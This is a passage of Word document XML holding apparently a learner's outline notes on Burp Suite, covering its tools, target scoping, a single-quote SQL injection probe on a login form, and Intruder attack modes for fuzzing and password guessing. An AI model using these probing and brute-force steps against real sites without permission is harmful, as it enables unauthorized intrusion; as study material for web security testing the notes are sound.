      <w:r w:rsidRPr="0084205E">
        <w:t>Import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B0E8F" w14:textId="6BDC6A76" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ok/ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED0F0E" w14:textId="343874A3" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="00637DAF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F6E3D" w14:textId="69A11619" w:rsidR="00637DAF" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D9BF15" w14:textId="35077FCA" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Proxy – funnel traffic through burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE4358" w14:textId="79D59BA3" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Target – set scope – create sitemap of tested app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0BCA5" w14:textId="651537A9" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Intruder – tool for fuzzing, stuffing, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A05381D" w14:textId="1D82E65E" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Repeater – repeat requests, used in conjunction with intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC73F3" w14:textId="2868A6DF" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sequencer – analyzes random parts of websites, often used to test cookie randomness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6909A" w14:textId="0565019D" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Decoder – perform data transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFB8CA6" w14:textId="0B432960" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Comparer – compare different responses or pieces of data or proxy histories (like Linux tool diff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96EC97" w14:textId="0E63DA99" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Extender – add components </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5D4C8" w14:textId="476FDEC1" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Scanner – automated web vuln scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C17A57" w14:textId="00794929" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD2D3A" w14:textId="4E31FF33" w:rsidR="006E6F01" w:rsidRPr="0084205E" w:rsidRDefault="006E6F01" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Requests require authorization to be sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1815E6" w14:textId="33403B7B" w:rsidR="00C32273" w:rsidRPr="0084205E" w:rsidRDefault="00C32273" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">In-line modification of requests – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>MiTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808E21F" w14:textId="4C7BB98B" w:rsidR="00C32273" w:rsidRPr="0084205E" w:rsidRDefault="00C32273" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Drop requests – helpful in watching web response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4189E9EE" w14:textId="05F8B63B" w:rsidR="00C32273" w:rsidRPr="0084205E" w:rsidRDefault="00C32273" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Forward requests to intruder and repeater for modification to induce vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173A10B" w14:textId="5AD6E56A" w:rsidR="00C32273" w:rsidRPr="0084205E" w:rsidRDefault="00C32273" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl-I – shortcut to send traffic to intruder, ctrl-r for repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BF106" w14:textId="030C2160" w:rsidR="00C32273" w:rsidRPr="0084205E" w:rsidRDefault="00C32273" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Websockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> history </w:t>
      </w:r>
      <w:r w:rsidR="00D00A6D" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">– saved history, commonly used to collaborate application requiring real-time updates (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D00A6D" w:rsidRPr="0084205E">
        <w:t>googledocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D00A6D" w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03690F02" w14:textId="12B3FC95" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">http history – useful for proof of actions through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or modifying/resending a request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED9016" w14:textId="65634512" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>intercept client requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DA938" w14:textId="34AC8EAF" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>and – URL – is in target scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA9D59" w14:textId="0CC33D7B" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>helps limit proxy intercept by not disturbing user searches outside of specified target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391A4FA8" w14:textId="63768628" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55058894" w14:textId="2FDA8E1B" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Define scope, view sitemap, specify definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A72A7" w14:textId="1A50DD10" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Build scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3D64EA" w14:textId="5EDB215B" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tiered approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA55F8A" w14:textId="79A6E376" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lowest privilege – site visitor or base user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12710F98" w14:textId="3C02CA80" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Discover full extent of site – happy path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F6A30" w14:textId="6CA2F8B1" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00D00A6D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remove unrelated items from scope after building site map from happy path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B8C72" w14:textId="346041FC" w:rsidR="00D00A6D" w:rsidRPr="0084205E" w:rsidRDefault="00E47589" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Target – sitemap – right-click and add to scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD02448" w14:textId="6A9FD619" w:rsidR="00E47589" w:rsidRPr="0084205E" w:rsidRDefault="00E47589" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Issue definitions – how issues are defined for reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5654F" w14:textId="77B34130" w:rsidR="00507FC1" w:rsidRPr="0084205E" w:rsidRDefault="00507FC1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D8B6D0" w14:textId="56050071" w:rsidR="00507FC1" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Typically used for the purposes of experimentation or more fine-tuned exploitation wherein automation may not be desired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EEC12D" w14:textId="182D372D" w:rsidR="00802C79" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attempt login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA8195" w14:textId="66F817B9" w:rsidR="00802C79" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Send failed attempt (found in HTTP history) to repeater and intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B30593" w14:textId="61BE5959" w:rsidR="00802C79" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB1C51" w14:textId="798D461B" w:rsidR="00802C79" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Adjust request to use single quote (‘) as both place of email and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC771EB" w14:textId="0127BC04" w:rsidR="00802C79" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enter as “’”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C64A2E4" w14:textId="1A781BD7" w:rsidR="00802C79" w:rsidRPr="0084205E" w:rsidRDefault="00802C79" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Causes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sqlite_error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CD0BD5B" w14:textId="70B52D0C" w:rsidR="00BE45A9" w:rsidRPr="0084205E" w:rsidRDefault="00BE45A9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Indicates login vulnerable to SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718E18E5" w14:textId="10633D7A" w:rsidR="00BE45A9" w:rsidRPr="0084205E" w:rsidRDefault="00BE45A9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intercept GET/POST – ID and change parameters before forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A1B94" w14:textId="4CD5FAE3" w:rsidR="00BE45A9" w:rsidRPr="0084205E" w:rsidRDefault="00BE45A9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F302E8" w14:textId="1C4EF4FA" w:rsidR="00BE45A9" w:rsidRPr="0084205E" w:rsidRDefault="00BE45A9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Many uses – core use: automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18EE4B" w14:textId="45054BBE" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Repeat testing once POC established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77378532" w14:textId="45D900D1" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating identifiers, cycling through predictable sessions, attempting simple password guessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31012B04" w14:textId="5B93A6C1" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Harvesting useful data from user profiles via grepping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A710E7B" w14:textId="7EDBF65B" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Fuzzing for vulns such as SQL injection, XSS, and path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786FB1E" w14:textId="527355BB" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Four Different Attack Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACD215" w14:textId="2D8168DC" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sniper – most popular, cycles through selected positions, putting the next available payload in each position in turn, uses only one set of payloads (wordlist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A07EA3" w14:textId="38B208D1" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Battering Ram – uses only one set of payloads, puts every payload into every selected position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037914EF" w14:textId="634644AD" w:rsidR="00844462" w:rsidRPr="0084205E" w:rsidRDefault="00844462" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pitchfork – use multiple payload sets (one per position selected) and iterate through both payloads simultaneously. Cycle through combinations equaling smallest payload set provided</w:t>
      </w:r>
    </w:p>
